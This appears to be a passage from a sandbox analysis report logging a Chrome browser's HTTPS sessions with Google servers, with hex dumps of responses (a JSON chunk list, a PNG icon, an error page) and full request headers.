                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC573INData Raw: 7b 22 63 68 75 6e 6b 54 79 70 65 73 22 3a 22 31 30 30 30 30 31 31 31 31 31 31 31 30 30 31 31 31 31 30 30 30 31 30 30 30 30 31 30 31 31 30 31 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 30 31 31 31 31 31 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: {"chunkTypes":"100001111111001111000100001011010000001111111111111111111111111111111011011111111111010111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 32 32 32 32 32 31 32 32 31 32 32 31 32 31 31 31 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 32 31 32 32 31 32 32 31 32 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31 32 32 31
                                                                                                                                                                                                                                                                                          Data Ascii: 212121212121212121212121212121212121212221212121212121212221222222122122121112212121212121212121212121212121212221212121212121212121212121212121212121222212212212221221221221221221221221221221221221221221221221221221221221221221221221221221221221221221221
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 32 31 33 31 33 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111121111111111111111111111131112131111111111111111111111111111111111111111131111131311111111111111111111111111111111112111111111111111111111111110111111111111111111111111111111111111113111111111111111111111111121111111121313112131111111111111111111111311
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 31 31 33 31 31 31 31 31 31 31 31 31 33 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 32 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 31 32 32 31 32 32 32 33 31 31 33 31 31 31 31 31 31 31 32 32 31 32 31 31 31 31 32 33 32 32 32 32 32 31 31 33 31 31 32 32 32 32 33 31 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111111111111011111111111111111111111111111111111111111111111111111111111221131111111113133111111111111111111112122222222212222222221221222311311111112212111123222221131122223113131111111111111111111111111111111111111111111111111111111111111111111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 31 31 31 31 31 32 32 32 32 32 32 32 32 31 32 32 32 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 31 31 31 31 31 31 31 31 31 32 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 31 32 32 31 31 32 32 31 31 32 32 32 31 31 31 32 31 31 31 31 32 32 32 31 32 32 32 31 31 32 32 32 32 32 32 32 32 32 31 31 32 32 31 32 32 32 32 32 32 31 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 31 32 32 32 32 32 32 32 32 32 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111111112222222222222222222211111122222222122221111111111111111111111111211111111111111111111212121121212121212121111111111121222222222222221212211221122211121111222122211222222222112212222221222222212222222222222222122222222221111111111111111111111111111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 33 31 32 32 31 33 32 33 31 31 31 31 31 31 31 31 31 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 33 32 32 32 32 32 31 32 32 32 32 32 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 32 32 32 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 32 31 31 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 111111111111111111111111111111111111111111131312213231111111112222222222222222222222222222222222222222222222222222222222222222222222222232222212222211111111131111111111111111111111121122212111111111111111111111111111111111111111111112111111111111211211111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC1390INData Raw: 31 32 32 31 33 32 31 31 31 32 32 33 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 32 32 31 31 33 31 31 32 31 32 32 32 32 32 32 32 33 32 32 33 32 33 32 32 32 31 31 32 31 31 31 32 32 33 31 33 31 33 31 31 31 31 32 30 30 30 32 30 32 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 32 30 30 30 30 30 30 30 30 30 32 32 32 32 30 32 30 32 32 32 30 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31
                                                                                                                                                                                                                                                                                          Data Ascii: 122132111223100000000000000000000000000000000000000000000200000000000000000000000000000000000000000001111111111111111111111111111111111111111111111222211311212222222322323222112111223131311112000202000000000000200020000000002222020222022220000000000000111
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC327INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 32 33 31 30 30 30 30 30 32 33 30 31 32 33 32 31 31 32 33 30 30 30 31 31 31 32 33 32 32 32 32 33 30 30 30 30 30 30 30 32 32 33 30 30 32 32 33 32 31 32 31 32 32 32 32 32 32 33 31 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 32 33 30 30 30 30 32 33 30 32 32 32 33 33 30 30 30 31 32 32 33 31 31 32 31 32 33 31 32 32 32 32 32 32 32 32 32 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 32 32 32 32 32 33 31 31 33 31 31 30 30 30 30 30 30 30 30 30 30 30 32 32 32 33 31 32 32 33 31 31 31 31 30 30 30 30 30 30 30 33 33 31 33 31 33 31 31 32 32 32 32 33 31 31 32 33 31 33
                                                                                                                                                                                                                                                                                          Data Ascii: 000000000000000011113111111111111111111111111111122310000023012321123000111232222300000002230022321212222223111111100000000000000022300002302223300012231121231222222222300000000000000000000000002222223113110000000000022231223111100000003313131122223112313


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          42192.168.2.749792142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC766OUTGET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; NID=517=0pWICYgHMs0q-7BzPo6KFxjDxz-SJgCVgj7jFPfXVbH6EjrjxWQ3Rl4lRdRUpk2LNOL2fdjvF93g43vXkJfqEPVF-u3r96lMxeDIRyymdIz_6oVDBsgJDwWab4ew6-xR-owJ_8OPa0nCoUm8CYc_2r0T-OcCst6msaOsdOwe2x5KU1dMUWSBSxX6OPpRIVWNLRI; OGPC=19037049-1:
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 2091
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:19 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:19 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC719INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 07 f2 49 44 41 54 78 01 c5 9a 03 f0 ec ea 12 c4 9f 6d a3 74 6d db 38 36 af 6d db b6 6d 9b 87 d7 b6 6d db 58 6f b0 f8 b3 5f 7e b5 e7 4d 6d e5 26 df e6 78 ab ba b2 15 76 cf f4 cc f7 05 3f 9a 13 bf 20 08 7e 5e a9 54 56 2e 97 cb fb 7a 9e 77 4b 84 97 ab d5 aa 1f 2d eb 60 c6 ff 77 a3 e5 1d 11 8e 8f f6 1b e0 fb fe 1f 7f 34 bf 7f 11 89 e5 22 1c 13 91 7a 36 5a e6 22 92 8a 96 a9 60 3b 40 d0 0c 91 e7 21 86 00 cc 53 e2 51 b4 c7 45 04 ee 8b d0 4c 24 eb 10 60 30 31 9e 10 53 28 14 76 8a c4 fc 76 6e 13 5f 19 e2 ee 48 bb 05 b8 10 9d ff cd 48 c4 66 73 9c 38 29 c6 2a f8 d9 08 cd 71 01 96 11 84 5c 1f ed ff f7 39 42 3e f2 e9 7f 29 3e 23 32 17 05 c4 b3 41 8d cd 16 f9 7a bd
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR00WIDATxmtm86mmmXo_~Mm&xv? ~^TV.zwK-`w4"z6Z"`;@!SQEL$`01S(vvn_HHfs8)*q\9B>)>#2Az
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1372INData Raw: eb dc e4 dd b8 cf fa 3e f3 f9 b4 e8 43 a8 eb e5 a1 0a 8e 5e 50 b9 01 43 db db 25 91 87 3c 84 20 36 e3 18 cf 39 07 82 2c e7 24 30 78 de 4d de 3d cd 60 5c f8 ff 4d 49 2e 91 7c d8 a3 b0 f0 8a fa 1e ff b5 fa 5e fe 83 ea 57 2d 22 88 e7 87 0c 40 04 85 4a fb b3 1e 9e 92 c5 b9 06 ee 4b 98 6d ee 91 1c fd 68 a7 ba d4 78 ef 48 f5 3e f4 63 f5 3e f1 77 21 a2 eb 9e ff aa b4 c5 3a 58 8a 62 25 92 76 cc bc 16 c0 ed 29 93 b6 5b 52 09 84 2d fb f4 3e f2 2b 21 a0 e7 b1 3f ab f7 b9 3f 8a ff 95 9d 16 51 e5 91 47 3a 46 bf a7 e1 a9 b7 6b d6 d0 ac 41 d2 29 60 2a 02 5e 4e 24 1f d4 e5 7b 39 f5 3c bb 50 44 fc 8f 90 37 60 29 d6 33 eb 64 bf d4 0c 06 9e 8e 9d 12 68 af 6b 03 ed 7b 5d 26 d8 be 3b 5e 1e 68 ca 73 3e 42 52 45 50 bb 58 c8 4f 8b 7e 50 7c 5b 10 8e 0b c0 52 5d af 6d 2c bf a1 b4
                                                                                                                                                                                                                                                                                          Data Ascii: >C^PC%< 69,$0xM=`\MI.|^W-"@JKmhxH>c>w!:Xb%v)[R->+!??QG:FkA)`*^N${9<PD7`)3dhk{]&;^hs>BREPXO~P|[R]m,


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          43192.168.2.749793142.250.181.2384435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC756OUTGET /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC270INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:19 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                          Content-Length: 1555
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC1120INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:20 UTC435INData Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e
                                                                                                                                                                                                                                                                                          Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          44192.168.2.749794142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:19 UTC3507OUTGET /xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/ck=xjs.hd.8JyeNrzotDo.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAIAoQHcSAACMAgA2ACAAAAAAAAQAAAMAAgQBAEQCAAACBOACACAQAAAFACISAABBE4BHmQCBESBMAAEUQAgQgAQIFEEoRAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAEAAxQACBADoIRAABgJhAgAgBPQABAAAAIAAgAJAAAEaAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/ujg=1/rs=ACT90oEgYxAnltOQ2uX96jprRQET-kPdwg/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sy [TRUNCATED]
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
